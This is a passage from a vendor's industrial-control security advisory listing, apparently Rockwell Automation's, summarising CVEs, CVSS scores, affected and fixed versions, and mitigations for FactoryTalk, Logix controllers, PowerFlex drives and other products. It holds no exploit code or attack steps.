Users using the affected software and who are not able to upgrade to one of the corrected versions are encouraged to apply security best practices, where possible.  

 

  • Security Best Practices  

 

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.     

  • JSON CVE-2024-4609

High
SD1669 | FactoryTalk® Historian SE vulnerable to AVEVA-2024-001 and AVEVA-2024-002
Published Date:
May 06, 2024
Last Updated:
November 19, 2024
CVE IDs:
CVE-2023-31274, CVE-2023-34348
CVSS Scores (v3.1):
7.5
CVSS Scores (v4.0):
7.7
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: May 9, 2024

Last updated: May 9, 2024

Revision Number: 1.0

CVSS Score: v3.1: 7.5/10, v4.0: 7.7/10

 

 

AFFECTED PRODUCTS AND SOLUTION

Affected Product | Affected Versions | Corrected in software version
FactoryTalk® Historian SE | < v9.0 | v9.01 and later

VULNERABILITY DETAILS

Rockwell Automation used versions 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-31274 IMPACT

FactoryTalk® Historian SE utilizes the AVEVA PI Server, which contains a vulnerability that could allow an unauthenticated user to cause a partial denial-of-service condition in the PI Message Subsystem of a PI Server by consuming available memory. This vulnerability exists in FactoryTalk® Historian SE versions 9.0 and earlier. Exploitation of this vulnerability could cause FactoryTalk® Historian SE to become unavailable, requiring a power cycle to recover it.

CVSS Base Score v3.1: 7.5/10

CVSS Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

 

CVSS Base Score v4.0: 7.7/10

CVSS Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:N/SA:H

CWE: Dependency on Vulnerable Third-Party Component

 

CVE-2023-34348 IMPACT

FactoryTalk® Historian SE uses the AVEVA PI Server, which contains a vulnerability that could allow an unauthenticated user to remotely crash the PI Message Subsystem of a PI Server, resulting in a denial-of-service condition. This vulnerability exists in FactoryTalk® Historian SE versions 9.0 and earlier. Exploitation of this vulnerability could cause FactoryTalk® Historian SE to become unavailable, requiring a power cycle to recover it.

CVSS Base Score v3.1: 7.5/10

CVSS Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

 

CVSS Base Score v4.0: 7.7/10

CVSS Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:N/SA:H

CWE: Dependency on Vulnerable Third-Party Component

 

Known Exploited Vulnerability (KEV) database:  No

 

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

 

Mitigations and Workarounds 

Users using the affected software are encouraged to install FactoryTalk® Historian SE version 9.01 or higher as soon as feasible. For customers unable to upgrade to v9.0, defensive measures are available in the Rockwell article.  

  • https://idp.rockwellautomation.com/adfs/ls/idpinitiatedsignon.aspx?RelayState=RPID%3Drockwellautomation.custhelp.com%26RelayState%3Danswers%2Fanswer_view%2Fa_id%2F1150873

Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.  

  • Security Best Practices 

 

ADDITIONAL RESOURCES

  • JSON CVE-2023-31274

  • JSON CVE-2023-34348

 

Critical
SD1668 | FactoryTalk® Production Centre Vulnerable to Apache ActiveMQ Vulnerability
Published Date:
April 18, 2024
Last Updated:
December 03, 2024
CVE IDs:
CVE-2023-46604
CVSS Scores (v3.1):
9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Published Date: April 16, 2024

Last updated: April 16, 2024

Revision Number: 1.0

CVSS Score: 9.8/10

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in Software Version | Corrected in Software Version
FactoryTalk® Production Centre | 10.0 | 11.03.00

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 of the CVSS scoring system to assess the following vulnerabilities. The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

 

CVE-2023-46604 IMPACT

Apache ActiveMQ, a component utilized in FactoryTalk Production Centre, is vulnerable to Remote Code Execution.  The vulnerability may allow a remote threat actor with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol. This could cause the broker to instantiate any class on the classpath. 

CVSS Base Score: 9.8

CVSS Vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE-502: Deserialization of Untrusted Data

Known Exploited Vulnerability (KEV) database: Yes

Users can use Stakeholder-Specific Vulnerability Categorization to generate environment specific prioritization.

Mitigations and Workarounds

Users using the affected software and who are not able to upgrade to one of the corrected versions are encouraged to apply security best practices, where possible. 

  • Update to the version that fixes the issue as detailed in this article.
  • Follow the security recommendations in PN1592 for FTPC.
  • Implement Security Best Practices

ADDITIONAL RESOURCES

  • JSON CVE-2023-46604

Critical
SD1666 | ControlLogix® and GuardLogix® Vulnerable to major nonrecoverable fault due to Invalid Header Value
Published Date:
April 11, 2024
Last Updated:
December 04, 2024
CVE IDs:
CVE-2024-3493
CVSS Scores (v3.1):
8.6
CVSS Scores (v4.0):
9.2
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: April 11, 2024

Last updated: May 2, 2024

Revision Number: 2.0

May 2, 2024 - Added products to Affected Products and Solutions section

CVSS Score: v3.1: 8.6/10, v4.0: 9.2/10

 

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in Firmware Revision | Corrected in Firmware Revision
ControlLogix® 5580 | V35.011 | V35.013, V36.011 and later
GuardLogix 5580 | V35.011 | V35.013, V36.011 and later
CompactLogix 5380 | V35.011 | V35.013, V36.011 and later
Compact GuardLogix 5380 | V35.011 | V35.013, V36.011 and later
1756-EN4TR | V5.001 | V6.001 and later
ControlLogix 5580 Process | V35.011 | V35.013, V36.011 and later
CompactLogix 5380 Process | V35.011 | V35.013, V36.011 and later
CompactLogix 5480 | V35.011 | V35.013, V36.011 and later

VULNERABILITY DETAILS  

Rockwell Automation used versions 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-3493 IMPACT

 A specific malformed fragmented packet type (fragmented packets may be generated automatically by devices that send large amounts of data) can cause a major nonrecoverable fault (MNRF). If exploited, the affected product will become unavailable and require a manual restart to recover it. Additionally, an MNRF could result in a loss of view and/or control of connected devices. 

CVSS Base Score v3.1: 8.6/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

 

CVSS Base Score v4.0: 9.2/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H

CWE: Improper Input Validation

Known Exploited Vulnerability (KEV) database:  No

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

 

Mitigations and Workarounds  

Users using the affected software and who are not able to upgrade to one of the corrected versions are encouraged to apply security best practices, where possible.  

  • Security Best Practices

     

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.     

  • JSON CVE-2024-3493

SD1667 | Input/output Device Vulnerable to Major Nonrecoverable Fault
Published Date:
April 11, 2024
Last Updated:
December 04, 2024
CVE IDs:
CVE-2024-2424
Products:
5015-AENFTXT
CVSS Scores (v3.1):
7.5
CVSS Scores (v4.0):
8.7
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: April 11, 2024

Last updated: April 17, 2024

Revision Number: 2.0

    4/17/24 - Updated Affected Products and Solutions 

CVSS Score: v3.1: 7.5/10, v4.0: 8.7/10

 

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in firmware version | Corrected in firmware version
5015-AENFTXT | v2.011 | v2.012 and later

VULNERABILITY DETAILS

Rockwell Automation used versions 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-2424 IMPACT

An input validation vulnerability exists in the affected products that causes the secondary adapter to enter a major nonrecoverable fault (MNRF) when malicious input is received. If exploited, the availability of the device will be impacted, and a manual restart is required. A malformed PTP packet is needed to exploit this vulnerability.

 

CVSS 3.1 Base Score: 7.5/10 

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

 

CVSS 4.0 Base Score: 8.7/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: Improper Input Validation

 

Known Exploited Vulnerability (KEV) database:  No

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds 

Users using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.  

  • Security Best Practices

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.  

  • JSON CVE-2024-2424

 

High
SD1665 | Arena® Simulation Vulnerabilities
Published Date:
March 26, 2024
Last Updated:
October 16, 2024
CVE IDs:
CVE-2024-21912, CVE-2024-21913, CVE-2024-2929, CVE-2024-21918, CVE-2024-21919, CVE-2024-21920
Products:
Arena® Simulation Software
CVSS Scores (v3.1):
7.8, 4.4
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Arena® Simulation Vulnerabilities
Published Date: March 26, 2024
Last updated: March 26, 2024
Revision Number: 1.0
CVSS Score: 7.8

AFFECTED PRODUCTS AND SOLUTION

Affected Product | CVE | First Known in Software Version | Corrected in Software Version
Arena® Simulation Software | CVE-2024-21912 | 16.00 | 16.20.03
Arena® Simulation Software | CVE-2024-21913, CVE-2024-2929, CVE-2024-21918, CVE-2024-21919, CVE-2024-21920 | 16.00 | Not remediated: this issue is within the Microsoft dynamic link library file. Do not open untrusted files from unknown sources to mitigate the issue.

VULNERABILITY DETAILS

These vulnerabilities were reported to Rockwell Automation by Michael Heinzl.  Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

 

CVE-2024-21912 IMPACT

An arbitrary code execution vulnerability could let a malicious user insert unauthorized code into the software. This is done by writing beyond the designated memory area, which causes an access violation. Once inside, the threat actor can run harmful code on the system. This affects the confidentiality, integrity, and availability of the product. To trigger this, the user would unwittingly need to open a malicious file shared by the threat actor.

CVSS Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-787 Out-of-bounds Write

Known Exploited Vulnerability (KEV) database: No

 

CVE-2024-21913 IMPACT

A heap-based memory buffer overflow vulnerability could potentially allow a malicious user to insert unauthorized code into the software by overstepping the memory boundaries, which triggers an access violation.  Once inside, the threat actor can run harmful code on the system. This affects the confidentiality, integrity, and availability of the product. To trigger this, the user would unwittingly need to open a malicious file shared by the threat actor.

CVSS Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-122: Heap-based Buffer Overflow

Known Exploited Vulnerability (KEV) database: No

 

CVE-2024-2929 IMPACT

A memory corruption vulnerability could potentially allow a malicious user to insert unauthorized code to the software by corrupting the memory triggering an access violation.  Once inside, the threat actor can run harmful code on the system. This affects the confidentiality, integrity, and availability of the product. To trigger this, the user would unwittingly need to open a malicious file shared by the threat actor.

CVSS Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer

Known Exploited Vulnerability (KEV) database: No

 

CVE-2024-21918 IMPACT

A memory buffer vulnerability could potentially allow a malicious user to insert unauthorized code to the software by corrupting the memory and triggering an access violation.  Once inside, the threat actor can run harmful code on the system. This affects the confidentiality, integrity, and availability of the product. To trigger this, the user would unwittingly need to open a malicious file shared by the threat actor.

CVSS Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-416: Use After Free

Known Exploited Vulnerability (KEV) database: No

 

CVE-2024-21919 IMPACT

An uninitialized pointer could potentially allow a malicious user to insert unauthorized code to the software by leveraging the pointer after it is properly.  Once inside, the threat actor can run harmful code on the system. This affects the confidentiality, integrity, and availability of the product. To trigger this, the user would unwittingly need to open a malicious file shared by the threat actor.

CVSS Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-824: Access of Uninitialized Pointer

 

CVE-2024-21920 IMPACT

A memory buffer vulnerability might let a threat actor read beyond the intended memory boundaries. This could reveal sensitive information and even cause the application to crash, resulting in a denial-of-service condition. To trigger this, the user would unwittingly need to open a malicious file shared by the threat actor.

CVSS Base Score: 4.4
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L
CWE-125: Out-of-bounds Read

Known Exploited Vulnerability (KEV) database: No

 

Mitigations and Workarounds

Customers using the affected software are encouraged to apply the risk mitigations, if possible.

  • Do not open untrusted files from unknown sources.
  • For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

  • CVE-2024-21912 JSON
  • CVE-2024-21913 JSON
  • CVE-2024-2929 JSON
  • CVE-2024-21918 JSON
  • CVE-2024-21919 JSON
  • CVE-2024-21920 JSON
High
SD1664 | Denial-of-service and Input Validation Vulnerabilities in PowerFlex® 527
Published Date:
March 21, 2024
Last Updated:
December 04, 2024
CVE IDs:
CVE-2024-2425, CVE-2024-2426, CVE-2024-2427
Products:
PowerFlex® 527
CVSS Scores:
7.5, 8.7
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
Yes

Published Date: March 21, 2024
Last updated: March 21, 2024
Revision Number: 1.0
CVSS Score: v3.1: 7.5/10, v4.0: 8.7/10

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in software version | Corrected in software version
PowerFlex® 527 | v2.001.x < | n/a

VULNERABILITY DETAILS

Rockwell Automation used versions 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-2425 IMPACT

A denial-of-service vulnerability exists in the PowerFlex® 527 due to improper input validation in the device. If exploited, the web server will crash and need a manual restart to recover it.

CVSS Base Score 3.1: 7.5/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS Base Score 4.0:  8.7/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE-120: Improper Input Validation

Known Exploited Vulnerability (KEV) database:  No

CVE-2024-2426 IMPACT

A denial-of-service vulnerability exists in the PowerFlex® 527 due to improper input validation in the device. If exploited, a disruption in the CIP communication will occur and a manual restart will be required by the user to recover it.

CVSS Base Score 3.1: 7.5/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS Base Score 4.0:  8.7/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: CWE-120 Improper Input Validation

Known Exploited Vulnerability (KEV) database:  No

CVE-2024-2427 IMPACT

A denial-of-service vulnerability exists in the PowerFlex® 527 due to improper traffic throttling in the device. If multiple data packets are sent to the device repeatedly the device will crash and require a manual restart to recover.

CVSS Base Score 3.1: 7.5/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS Base Score 4.0: 8.7/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: CWE-400: Uncontrolled Resource Consumption

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds

There is currently no fix for these vulnerabilities. Users of the affected software are encouraged to apply risk mitigations and security best practices, where possible.

  • Implement network segmentation, confirming the device is on an isolated network.
  • Disable the web server, if not needed. The web server is disabled by default. Disabling this feature is available in v2.001.x and later.
  • Security Best Practices

ADDITIONAL RESOURCES

  • JSON CVE-2024-2425
  • JSON CVE-2024-2426
  • JSON CVE-2024-2427
Medium
SD1663 | FactoryTalk® View ME on PanelView™ Plus 7 Boot Terminal lack Security Protections
Published Date:
March 21, 2024
Last Updated:
December 03, 2024
CVE IDs:
CVE-2024-21914
Products:
FactoryTalk® View ME
CVSS Scores (v3.1):
5.3
CVSS Scores (v4.0):
6.9
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: March 21, 2024
Last updated: March 21, 2024
Revision Number: 1.0
CVSS Score: v3.1: 5.3/10, v4.0: 6.9/10

The security of our products is important to us as your chosen industrial automation supplier. This vulnerability was found internally during routine testing and is being reported based on our commitment to customer transparency.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in software version | Corrected in software version
FactoryTalk® View ME | <v14 | V11, V12, V13, V14

VULNERABILITY DETAILS

Rockwell Automation used the CVSS v3.1 and v4.0 scoring systems to assess the following vulnerabilities.

CVE-2024-21914 IMPACT

A vulnerability exists in the affected product that allows a malicious user to restart the PanelView™ Plus 7 terminal remotely without security protections. If the vulnerability is exploited, it could lead to the loss of view or control of the PanelView™ product.

CVSS 3.1 Base Score: 5.3

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CVSS 4.0 Base Score: 6.9

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

CWE: Improper security protection for remote restart action

Known Exploited Vulnerability (KEV) database:  No

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds

Users of the affected software who are not able to upgrade to one of the corrected versions are encouraged to apply security best practices, where possible.

  • Security Best Practices

ADDITIONAL RESOURCES

  • JSON CVE-2024-21914
Critical
SD1662 | FactoryTalk® Service Platform Elevated Privileges Vulnerability Through Web Service Functionality
Published Date:
February 14, 2024
Last Updated:
December 04, 2024
CVE IDs:
CVE-2024-21915
Products:
FactoryTalk® Service Platform
CVSS Scores (v3.1):
9.0
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Published Date: February 15, 2024
Last updated: February 15, 2024
Revision Number: 1.0
CVSS Score: 9.0/10

The security of our products is important to us as your chosen industrial automation supplier. This vulnerability was found internally during routine testing and is being reported based on our commitment to customer transparency.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in software version | Corrected in software version
FactoryTalk® Service Platform | <v2.74 | Update to V2.74 or later

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-21915 IMPACT

A privilege escalation vulnerability exists in FactoryTalk® Service Platform (FTSP). If exploited, a malicious user with basic user group privileges could potentially sign into the software and receive FTSP Administrator Group privileges. A threat actor could potentially read and modify sensitive data, delete data and render the FTSP system unavailable.

CVSS Base Score: 9.0
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
CWE: CWE-279: Incorrect Execution-Assigned Permissions

Known Exploited Vulnerability (KEV) database:  No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

  • Security Best Practices

ADDITIONAL RESOURCES

  • Patch: Incorrect user groups returned from FactoryTalk® Web Service, FactoryTalk® Services Platform 2.74
  • JSON CVE-2024-21915
High
SD1661 | Denial-of-service Vulnerability in ControlLogix® and GuardLogix® Controllers
Published Date:
January 30, 2024
Last Updated:
November 20, 2024
CVE IDs:
CVE-2024-21916
Products:
ControlLogix® 5570, GuardLogix® 5570, ControlLogix® 5570 Redundancy
CVSS Scores (v3.1):
8.6
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Denial-of-service Vulnerability in ControlLogix® and GuardLogix® Controllers

Published Date: January 30, 2024

Last updated: 1.0

Revision Number: 1.0

CVSS Score: 8.6

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in Firmware | Corrected in Firmware
ControlLogix® 5570 | 20.011 | v33.016, 34.013, 35.012, 36.011 and later
GuardLogix® 5570 | 20.011 | v33.016, 34.013, 35.012, 36.011 and later
ControlLogix® 5570 Redundancy | 20.054_kit1 | v33.053_kit1, 34.052_kit1, 35.052_kit1, 36.051_kit1 and later

Mitigations and Workarounds

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-21916 IMPACT

A denial-of-service vulnerability exists in the affected products listed above. If exploited, the product could potentially experience a major nonrecoverable fault (MNRF). The device will restart itself to recover from the MNRF.

CVSS Base Score: 8.6

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

CWE: Improper Restriction of Operations within the Bounds of a Memory Buffer

Known Exploited Vulnerability (KEV) database:  No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

  • JSON CVE-2024-21916
Critical
SD1660 | FactoryTalk® Service Platform Service Token Vulnerability
Published Date:
January 30, 2024
Last Updated:
December 04, 2024
CVE IDs:
CVE-2024-21917
Products:
FactoryTalk® Service Platform
CVSS Scores (v3.1):
9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

FactoryTalk® Service Platform Service Token Vulnerability

Published Date: January 30, 2024

Last updated: March 5, 2024 (Updated Mitigations and Workarounds)

Revision Number: 1.0

CVSS Score: 9.8/10

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in software version | Corrected in software version
FactoryTalk® Service Platform | <= v6.31 | v6.40 or later

Mitigations and Workarounds

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

Customers updating to v6.40 or later should do one of the following steps:

  1. Set the FactoryTalk Directory’s System Communications Type security policy to SOCKET.IO. This prevents FactoryTalk Services Platform from using the DCOM communication channel. When set to SOCKET.IO only v6.40, and later, FactoryTalk Directory clients can communicate with the FactoryTalk Directory server.

  2. If the v6.40 (or later) FactoryTalk Directory server must support communication with legacy FactoryTalk Directory client versions, v6.31 and earlier, do not alter the System Communication Type setting from AUTO or DCOM.
    Instead, elevate DCOM Authentication Level to PACKET PRIVACY (‘6’). Please refer to Mitigating Microsoft DCOM Hardening Patch (CVE-2021-26414) for Affected Rockwell Automation Products (custhelp.com)

IMPORTANT! Two v6.40 (or later) FactoryTalk Directory security policies can prevent legacy FactoryTalk Directory clients, v6.31 and earlier, from connecting with the FactoryTalk Directory server. Ensure both security policies are set to Legacy to allow the connection.
The two security policies are the Service Token signature method and Encryption method.

Customers who are unable to update to v6.40 or later should apply the following mitigations:

  • Set DCOM authentication level to 6, which enables encryption of the service token and communication channel between the server and client. Please refer to Mitigating Microsoft DCOM Hardening Patch (CVE-2021-26414) for Affected Rockwell Automation Products (custhelp.com)
  • When it is not possible to update to v6.40 or later, enable verification of the publisher information (i.e., digital signature) of any executable attempting to use the FactoryTalk® Services APIs. This helps prevent a malicious user from calling the API to receive the service token. This setting can be changed from the Application Authorization node located within System Policies using the FactoryTalk® Administration Console application.
  • Security Best Practices

VULNERABILITY DETAILS

Rockwell Automation used the CVSS v3.1 scoring system to assess the following vulnerabilities.

CVE-2024-21917 IMPACT

A vulnerability exists in the affected product that allows a malicious user to obtain the service token and use it for authentication on another FTSP directory. This is due to the lack of digital signing between the FTSP service token and directory. If exploited, a malicious user could potentially retrieve user information and modify settings without any authentication.

CVSS Base Score: 9.8/10 (Critical)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-347 Improper Verification of Cryptographic Signature

Known Exploited Vulnerability (KEV) database:  No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

  • JSON CVE-2024-21917
High
SD1659 | LP30/40/50 and BM40 Operator Interface Vulnerable to CODESYS Vulnerabilities
Published Date:
January 24, 2024
Last Updated:
December 01, 2024
CVE IDs:
CVE-2022-47378, CVE-2022-47379, CVE-2022-47380, CVE-2022-47381, CVE-2022-47382, CVE-2022-47383, CVE-2022-47384, CVE-2022-47386, CVE-2022-47387, CVE-2022-47388, CVE-2022-47389, CVE-2022-47390, CVE-2022-47385, CVE-2022-47392, CVE-2022-47393
Products:
LP30 Operator Panel, LP40 Operator Panel, BM40 Operator Panel, LP50 Operator Panel
CVSS Scores (v3.1):
6.5, 8.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Published Date: January 25, 2024

Last updated: January 25, 2024

Revision Number: 1.0

CVSS Score: 8.8

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in Software Revision | Corrected in Software Revision
LP30 Operator Panel | Codesys versions before V3.5.19.0 | Codesys 3.5.19.2
LP40 Operator Panel | Codesys versions before V3.5.19.0 | Codesys 3.5.19.2
BM40 Operator Panel | Codesys versions before V3.5.19.0 | Codesys 3.5.19.2
LP50 Operator Panel | Codesys versions before V3.5.19.0 | Codesys 3.5.19.2

VULNERABILITY DETAILS

The CODESYS Control runtime system is utilized in the affected ASEM™ (A Rockwell Automation Company) products and enables embedded or PC-based devices to be programmable industrial controllers. Such products contain communication servers for the CODESYS protocol to enable communication with clients like the CODESYS Development System.

These products have the following vulnerabilities:

CVE-2022-47378 IMPACT

CVSS Base Score: 6.5/10 (Medium)

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CWE-1288: Improper Validation of Consistency within Input

After successful authentication, specifically crafted communication requests with inconsistent content can cause the CmpFiletransfer component to read internally from an invalid address, potentially leading to a denial-of-service condition.

CVE-2022-47379 IMPACT

CVSS Base Score: 8.8/10 (High)

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE-787: Out-of-bounds Write

After successful authentication, specifically crafted communication requests can cause the CmpApp component to write threat actor-controlled data to memory, which can lead to a denial-of-service condition, memory overwriting, or remote code execution.

CVE-2022-47380, CVE-2022-47381 IMPACT

CVSS Base Score: 8.8/10 (High)

CWE-121: Stack-based Buffer Overflow

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

After successful authentication, specifically crafted communication requests can cause the CmpApp component to write threat actor-controlled data to stack, which can lead to a denial-of-service condition, memory overwriting, or remote code execution.

CVE-2022-47382, CVE-2022-47383, CVE-2022-47384, CVE-2022-47386, CVE-2022-47387, CVE-2022-47388, CVE-2022-47389, CVE-2022-47390 IMPACT

CVSS Base Score: 8.8/10 (High)

CWE-121: Stack-based Buffer Overflow

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

After successful authentication, specifically crafted communication requests can cause the CmpTraceMgr component to write threat actor-controlled data to stack, which can lead to a denial-of-service condition, memory overwriting, or remote code execution.

CVE-2022-47385 IMPACT

CVSS Base Score: 8.8/10 (High)

CWE-121: Stack-based Buffer Overflow

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

After successful authentication, specifically crafted communication requests can cause the CmpAppForce component to write threat actor-controlled data to stack, which can lead to a denial-of-service condition, memory overwriting, or remote code execution.

CVE-2022-47392 IMPACT

CVSS Base Score: 6.5/10 (Medium)

CWE-1288: Improper Validation of Consistency within Input

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

After successful authentication, specifically crafted communication requests with inconsistent content can cause the CmpApp/CmpAppBP/CmpAppForce components to read internally from an invalid address, potentially leading to a denial-of-service condition.

CVE-2022-47393 IMPACT

CVSS Base Score: 6.5/10 (Medium)

CWE-822: Untrusted Pointer Dereference

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

After successful authentication, specifically crafted communication requests can cause the CmpFiletransfer component to dereference addresses provided by the request for internal read access, which can lead to a denial-of-service situation.

Mitigations and Workarounds

Customers using the affected software are encouraged to apply the risk mitigations, if possible.

  • Upgrade to CODESYS version 3.5.19.2, which has been released to mitigate these issues.
  • Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

CODESYS Advisory

High
SD1658 | SIS Workstation and ISaGRAF Workbench Code Execution and Privilege Escalation
Published Date:
November 15, 2023
Last Updated:
November 15, 2023
CVE IDs:
CVE-2015-9268
Products:
Safety Instrumented System Workstation, ISaGRAF® Workbench
CVSS Scores:
7.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Published Date: November 14, 2023

Last updated: November 14, 2023

Revision Number: 1.0

CVSS Score: 7.8/10

The security of our products is important to us as your chosen industrial automation supplier. This vulnerability was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in Software Version | Corrected in Software Version
Safety Instrumented System Workstation | <= v1.2 | v2.00 and later
ISaGRAF® Workbench | <= v6.6.9 | v6.06.10 and later

VULNERABILITY DETAILS

